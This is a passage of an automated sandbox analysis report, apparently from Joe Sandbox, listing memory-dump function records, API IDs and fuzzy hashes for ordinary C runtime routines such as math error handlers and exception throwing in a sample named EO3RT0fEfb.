                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateHandleProcess
                                                            • String ID:
                                                            • API String ID: 3712363035-3916222277
                                                            • Opcode ID: 7b42f129ca5b2bc2214f050bb36978d190a1a5278d42b1070c82c133f3bdff27
                                                            • Instruction ID: b32c26708a9d385ad8e9acd8ad14d21a83bfd255d632d657b4c156082e963887
                                                            • Opcode Fuzzy Hash: 7b42f129ca5b2bc2214f050bb36978d190a1a5278d42b1070c82c133f3bdff27
                                                            • Instruction Fuzzy Hash: 7A1186B1A0878186E710EF16F90019AF7A1FB84784F884139DA8D47A64CF3DD550CB10
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 3678867486-1403004172
                                                            • Opcode ID: 2fa39eb79566fbbf5ef709d97066772d08e715fc924eaba82c6fe28b878daa18
                                                            • Instruction ID: 8bc42b94e4e67c852ba21b84e22be9febd68f8fceedfd18e609ddfcacb6a53ad
                                                            • Opcode Fuzzy Hash: 2fa39eb79566fbbf5ef709d97066772d08e715fc924eaba82c6fe28b878daa18
                                                            • Instruction Fuzzy Hash: 70015E66A199C291EE20F724F5915F9E360EB85384FC84131E59D07A9ADF2CD609CB60
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: _ctrlfp_handle_error_raise_exc
                                                            • String ID: !$tan
                                                            • API String ID: 3384550415-2428968949
                                                            • Opcode ID: 2d553fd115d33d3a807ffc94b8434da97490ee8f564b276a29f6e1ed56bbbb66
                                                            • Instruction ID: d83e8bc5f3fc4b843bd867cc35a660cadb46ab9fd80067bbaa838fe508d232f5
                                                            • Opcode Fuzzy Hash: 2d553fd115d33d3a807ffc94b8434da97490ee8f564b276a29f6e1ed56bbbb66
                                                            • Instruction Fuzzy Hash: 40019672A28BC541DA14DF12A40037AA152BBDABD4F544334E95E1BB94EF7CD1508B00
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: _ctrlfp_handle_error_raise_exc
                                                            • String ID: !$sin
                                                            • API String ID: 3384550415-1565623160
                                                            • Opcode ID: 9c5650ba25f23863d1585264c289844e213b1bc1e7bffeede2023515f4cd1262
                                                            • Instruction ID: d4ea29123299366c555af7bdee2bdfe5ef185af76d8c4cc34c796effb4e276ab
                                                            • Opcode Fuzzy Hash: 9c5650ba25f23863d1585264c289844e213b1bc1e7bffeede2023515f4cd1262
                                                            • Instruction Fuzzy Hash: 4101D873E18BC541EA14DF22A40037AA252BFDBBD4F504334E95E1AB94EF7DD0404B00
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: _ctrlfp_handle_error_raise_exc
                                                            • String ID: !$cos
                                                            • API String ID: 3384550415-1949035351
                                                            • Opcode ID: 59a2c881f09cdb696690f699cc12801b637b051dbcc35695dacf0c08331e8fc0
                                                            • Instruction ID: f06287c458bdcaf2e40b1e5de39d63633a28cb5582b74cb2332b0f143a2fcbf7
                                                            • Opcode Fuzzy Hash: 59a2c881f09cdb696690f699cc12801b637b051dbcc35695dacf0c08331e8fc0
                                                            • Instruction Fuzzy Hash: DA01D873E18BC941EA14DF22A40037AA152BFDBBD4F504334E95E1AB94EF7DD0504B00
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: _handle_error
                                                            • String ID: "$exp
                                                            • API String ID: 1757819995-2878093337
                                                            • Opcode ID: 1dd5b4e450707440dd9d18b5c78d2e187119c4904f0596c8cb375bf303972248
                                                            • Instruction ID: b9904831c76fd88f200fc4cf742d04641c3c2ce4848e017cf65e714b6d224093
                                                            • Opcode Fuzzy Hash: 1dd5b4e450707440dd9d18b5c78d2e187119c4904f0596c8cb375bf303972248
                                                            • Instruction Fuzzy Hash: A101C876929BC883F620DF24E0452EBB7B1FFEA354F641315E74426A60DB7DD4819B00
                                                            APIs
                                                            • try_get_function.LIBVCRUNTIME ref: 00007FF75F1675E9
                                                            • TlsSetValue.KERNEL32(?,?,?,00007FF75F167241,?,?,?,?,00007FF75F16660C,?,?,?,?,00007FF75F164CD3), ref: 00007FF75F167600
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Valuetry_get_function
                                                            • String ID: FlsSetValue
                                                            • API String ID: 738293619-3750699315
                                                            • Opcode ID: 5ef202829eb63c082d646b2b3c40b210c8e2726f911b0f602dea3cecf0443926
                                                            • Instruction ID: 2536aa138cbb57fa3d1b52d122950ecce4226d94a47960db5635aea79d6ac0da
                                                            • Opcode Fuzzy Hash: 5ef202829eb63c082d646b2b3c40b210c8e2726f911b0f602dea3cecf0443926
                                                            • Instruction Fuzzy Hash: 17E06561A1C5C281FF097B55F8404F4A362AF88B91FCC4431DA0F06655EF3CD485C630
                                                            APIs
                                                            • std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF75F165629
                                                            • _CxxThrowException.LIBVCRUNTIME ref: 00007FF75F16563A
                                                              • Part of subcall function 00007FF75F167018: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF75F16563F), ref: 00007FF75F16708D
                                                              • Part of subcall function 00007FF75F167018: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF75F16563F), ref: 00007FF75F1670BF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
                                                            • String ID: Unknown exception
                                                            • API String ID: 3561508498-410509341
                                                            • Opcode ID: 9460797eaada1e9b880d8cc7196a2a9f4627ae69dcab396aeadb3e3bc5cc4094
                                                            • Instruction ID: c45731b6e2820650558dac849fa2a73da0ee98db316e0edad519e61e1de61034
                                                            • Opcode Fuzzy Hash: 9460797eaada1e9b880d8cc7196a2a9f4627ae69dcab396aeadb3e3bc5cc4094
                                                            • Instruction Fuzzy Hash: 48D05E26A189C691DF10FB04E8953E8E331FB90308FD84432E24D829B5EF2DD64AD720